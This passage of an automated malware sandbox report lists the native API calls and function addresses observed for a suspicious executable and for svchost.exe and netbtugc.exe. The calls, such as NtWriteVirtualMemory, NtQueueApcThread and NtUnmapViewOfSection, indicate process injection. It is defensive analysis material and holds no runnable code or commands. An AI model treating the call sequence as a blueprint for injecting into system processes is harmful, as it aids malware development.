            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B4340 NtSetContextThread,LdrInitializeThunk,5_2_037B4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B4650 NtSuspendThread,LdrInitializeThunk,5_2_037B4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2B60 NtClose,LdrInitializeThunk,5_2_037B2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_037B2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_037B2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_037B2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2AF0 NtWriteFile,LdrInitializeThunk,5_2_037B2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2AD0 NtReadFile,LdrInitializeThunk,5_2_037B2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2F30 NtCreateSection,LdrInitializeThunk,5_2_037B2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2FE0 NtCreateFile,LdrInitializeThunk,5_2_037B2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2FB0 NtResumeThread,LdrInitializeThunk,5_2_037B2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_037B2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_037B2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_037B2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_037B2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_037B2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2DD0 NtDelayExecution,LdrInitializeThunk,5_2_037B2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_037B2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2C60 NtCreateKey,LdrInitializeThunk,5_2_037B2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_037B2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B35C0 NtCreateMutant,LdrInitializeThunk,5_2_037B35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B39B0 NtGetContextThread,LdrInitializeThunk,5_2_037B39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2B80 NtQueryInformationFile,5_2_037B2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2AB0 NtWaitForSingleObject,5_2_037B2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2F60 NtCreateProcessEx,5_2_037B2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2FA0 NtQuerySection,5_2_037B2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2F90 NtProtectVirtualMemory,5_2_037B2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2E30 NtWriteVirtualMemory,5_2_037B2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2EA0 NtAdjustPrivilegesToken,5_2_037B2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2D00 NtSetInformationFile,5_2_037B2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2DB0 NtEnumerateKey,5_2_037B2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2C00 NtQueryInformationProcess,5_2_037B2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2CF0 NtOpenProcess,5_2_037B2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B2CC0 NtQueryVirtualMemory,5_2_037B2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B3010 NtOpenDirectoryObject,5_2_037B3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B3090 NtSetValueKey,5_2_037B3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B3D70 NtOpenThread,5_2_037B3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B3D10 NtOpenProcessToken,5_2_037B3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D68E60 NtReadFile,5_2_02D68E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D68F50 NtDeleteFile,5_2_02D68F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D68CF0 NtCreateFile,5_2_02D68CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D69000 NtClose,5_2_02D69000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_02D69160 NtAllocateVirtualMemory,5_2_02D69160
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\jpdy1E8K4A.exeCode function: 0_2_040D46080_2_040D4608
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181132_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9C32_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9BC2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022092_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022102_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162FE2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162BC2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163032_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBE32_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC632_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DC02_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6532_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4E3F02_2_03A4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B003E62_2_03B003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFA3522_2_03AFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC02C02_2_03AC02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE02742_2_03AE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF41A22_2_03AF41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B001AA2_2_03B001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF81CC2_2_03AF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A301002_2_03A30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADA1182_2_03ADA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AC81582_2_03AC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD20002_2_03AD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3C7C02_2_03A3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A407702_2_03A40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A647502_2_03A64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5C6E02_2_03A5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B005912_2_03B00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A405352_2_03A40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEE4F62_2_03AEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE44202_2_03AE4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF24462_2_03AF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF6BD72_2_03AF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFAB402_2_03AFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3EA802_2_03A3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A429A02_2_03A429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0A9A62_2_03B0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A569622_2_03A56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A268B82_2_03A268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A6E8F02_2_03A6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4A8402_2_03A4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A428402_2_03A42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ABEFA02_2_03ABEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4CFE02_2_03A4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A32FC82_2_03A32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A82F282_2_03A82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A60F302_2_03A60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE2F302_2_03AE2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB4F402_2_03AB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A52E902_2_03A52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFCE932_2_03AFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEEDB2_2_03AFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFEE262_2_03AFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40E592_2_03A40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A58DBF2_2_03A58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A3ADE02_2_03A3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4AD002_2_03A4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADCD1F2_2_03ADCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE0CB52_2_03AE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A30CF22_2_03A30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A40C002_2_03A40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A8739A2_2_03A8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF132D2_2_03AF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2D34C2_2_03A2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A452A02_2_03A452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE12ED2_2_03AE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B2C02_2_03A5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A4B1B02_2_03A4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7516C2_2_03A7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A856302_2_03A85630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B095C32_2_03B095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A438E02_2_03A438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AAD8002_2_03AAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFFB12_2_03AFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A41F922_2_03A41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD22_2_03A03FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A03FD52_2_03A03FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFF092_2_03AFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A49EB02_2_03A49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FDC02_2_03A5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7D732_2_03AF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A43D402_2_03A43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF1D5A2_2_03AF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFCF22_2_03AFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB9C322_2_03AB9C32
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E2D713_2_043E2D71
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EB41D3_2_043EB41D
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EB4643_2_043EB464
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043EB45F3_2_043EB45F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E4D443_2_043E4D44
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_044037B43_2_044037B4
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E4B243_2_043E4B24
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_043E4B1D3_2_043E4B1D
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_07151F1F3_2_07151F1F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_0714FF9F3_2_0714FF9F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_0715863F3_2_0715863F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_0715863A3_2_0715863A
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_07156DCF3_2_07156DCF
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_071585F83_2_071585F8
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_0715A44F3_2_0715A44F
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_07151CFF3_2_07151CFF
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_07151CF83_2_07151CF8
            Source: C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exeCode function: 3_2_0717098F3_2_0717098F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038403E65_2_038403E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0378E3F05_2_0378E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383A3525_2_0383A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038002C05_2_038002C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038202745_2_03820274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038341A25_2_038341A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038401AA5_2_038401AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038381CC5_2_038381CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037701005_2_03770100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0381A1185_2_0381A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038081585_2_03808158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038120005_2_03812000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037807705_2_03780770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037A47505_2_037A4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0377C7C05_2_0377C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0379C6E05_2_0379C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038405915_2_03840591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037805355_2_03780535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0382E4F65_2_0382E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038244205_2_03824420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038324465_2_03832446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03836BD75_2_03836BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383AB405_2_0383AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0377EA805_2_0377EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037969625_2_03796962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0384A9A65_2_0384A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037829A05_2_037829A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0378A8405_2_0378A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037828405_2_03782840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037AE8F05_2_037AE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037668B85_2_037668B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037F4F405_2_037F4F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037A0F305_2_037A0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037C2F285_2_037C2F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0378CFE05_2_0378CFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03822F305_2_03822F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03772FC85_2_03772FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037FEFA05_2_037FEFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383CE935_2_0383CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03780E595_2_03780E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383EEDB5_2_0383EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383EE265_2_0383EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03792E905_2_03792E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0378AD005_2_0378AD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0377ADE05_2_0377ADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0381CD1F5_2_0381CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03798DBF5_2_03798DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03820CB55_2_03820CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03780C005_2_03780C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03770CF25_2_03770CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0376D34C5_2_0376D34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0383132D5_2_0383132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037C739A5_2_037C739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_038212ED5_2_038212ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0379B2C05_2_0379B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037852A05_2_037852A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0376F1725_2_0376F172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_037B516C5_2_037B516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_0378B1B05_2_0378B1B0
